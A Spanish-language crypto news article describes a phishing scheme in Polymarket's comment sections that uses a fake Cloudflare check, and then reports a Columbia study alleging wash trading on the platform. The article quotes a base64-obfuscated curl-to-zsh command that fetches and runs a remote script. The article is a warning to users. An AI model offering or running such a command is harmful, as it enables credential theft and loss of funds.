Enlaces de phishing en los mercados privados de Polymarket: los usuarios alertan

Polymarket está nuevamente en los titulares, esta vez porque uno de sus operadores principales, con el apodo "25usdc", hizo sonar la alarma sobre un esquema que utiliza la sección de comentarios de la plataforma para aprovecharse de usuarios desprevenidos. 

Esto ocurre en un momento crucial para la plataforma Polymarket, que se está preparando para volver a ingresar al mercado estadounidense y está luchando por superar a rivales como Kalshi. 

Los comerciantes de Polymarket en alerta máxima 

Según 25usdc, los piratas informáticos han estado utilizando la sección de comentarios de Polymarket para ejecutar una estafa y, hasta ahora, los usuarios han perdido más de $500,000.

Dicen: '¿Por qué no operas en los mercados privados de Polymarket? ¡Siempre hay mejores probabilidades allí!'", escribió 25usdc, antes de explicar cómo funciona la estafa. 

Según él, todo comienza con la compra de acciones Sí y No para un mercado desde dos cuentas separadas. De esta manera, sus comentarios siguen ahí incluso con el filtro "Titulares" activado. Después, publican una URL a su sitio web de forma ofuscada.

La URL lleva al usuario desprevenido a una página limpia con el logotipo de Polymarket y solicita el inicio de sesión por correo electrónico. Una vez verificado el correo electrónico, aparece una nueva ventana que solicita al usuario que verifique su actividad, imitando a CloudFlare. 

Sin embargo, 25usdc dice que cuando hace clic en "Copiar", se copia un comando parecido a esto "curl -kfsSL $(echo 'ENCODED_STRING=='|base64 -d)|zsh" y lo primero que hace, si el usuario comete el error de pegarlo en su terminal, es decodificar la cadena codificada en base64 (una URL del servidor), después de lo cual obtiene un script de ese servidor y lo ejecuta inmediatamente. 

El script en cuestión puede contener cualquier cosa y, según se informa, no aparecerá ninguna advertencia emergente, momento en el cual el daño ya está hecho y la única solución, según 25usdc, podría ser apagar el Wi-Fi. 

“Al final, recopilan datos, registran todo en tu sistema y envían un archivo zip a su servidor”, escribió 25usdc. “Luego usan estos datos para acceder a tus cuentas y robarte el dinero”

Otras cosas que notó fueron el cuidado con el que opera el grupo; por ejemplo, cubren sus rastros cambiando de billetera con frecuencia, ofuscan en cada paso del camino e incluso apagan el servidor que envía cargas útiles y recibe datos registrados cuando no hay una víctima activa.

“Creo que la mejor manera de abordar esto es permitir que los usuarios de confianza revisen los comentarios o introducir un sistema de votos negativos que oculte las publicaciones con muchos votos negativos”, concluyó 25usdc, señalando que la simple advertencia que muestra Polymarket actualmente no será suficiente. 

Anuncio de servicio público: No existe un sitio web de “mercado privado” de Polymarket con “mejores probabilidades”

Nunca ingrese su correo electrónico de Polymarket ni su código de verificación de inicio de sesión en ningún otro sitio que no sea nuestro sitio oficial.

— Polymarket Traders (@PolymarketTrade) 9 de noviembre de 2025

Un nuevo estudio afirma que el volumen de Polymarket se sustenta en operaciones de lavado

Tal como Cryptopolitan informó, un estudio publicado recientemente por investigadores de la Universidad de Columbia afirma que el volumen de actividad en Polymarket se ha visto significativamente inflado por operaciones ficticias. 

El “comercio artificial”, como lo denominan los autores, varió con el tiempo, pero dicen que representó un promedio del 25% de todas las compras y ventas en Polymarket durante los últimos tres años. 

El artículo no ha sido sometido a revisión por pares, pero ya está en la plataforma de investigación de acceso abierto SSRN y está siendo revisado por Polymarket. 

Cabe aclarar que los autores no acusan directamente Polymarket de realizar operaciones ficticias. Sin embargo, han resaltado elementos de la estructura basada en criptomonedas de la plataforma que hacen plausible la afirmación.  

También han sugerido que los clientes de la compañía pueden haber participado de formadenten dichas operaciones de lavado en un intento de mejorar sus posibilidades de obtener acceso a un token digital patentado que el fundador de la compañía, Shayne Coplan, ha insinuado la posibilidad de lanzar tan recientemente como el 8 de octubre. 

"Espero que Polymarket acoja con agrado el análisis de nuestro artículo", declaró en un correo electrónico Yash Kanoria, profesor de la escuela de negocios de la Universidad de Columbia y uno de los cuatro coautores del artículo. "El lavado de activos no aporta liquidez ni información al mercado, por lo que sería valioso distinguir el volumen auténtico del falso"

Si parte del volumen de Polymarket es verdaderamente "ficticio", el estudio afirma que podría alterar la comprensión de la fortaleza relativa de Polymarket en la industria y también socavar la noción actual de que los mercados de predicción reflejan la "sabiduría de una multitud más grande"

“El potencial de lavado de activos a gran escala implica que el volumen puede no ser una medida confiable de la actividad auténtica de la plataforma, especialmente en los intercambios basados ​​en criptomonedas que pueden no tener las salvaguardas adecuadas”, concluyeron los autores.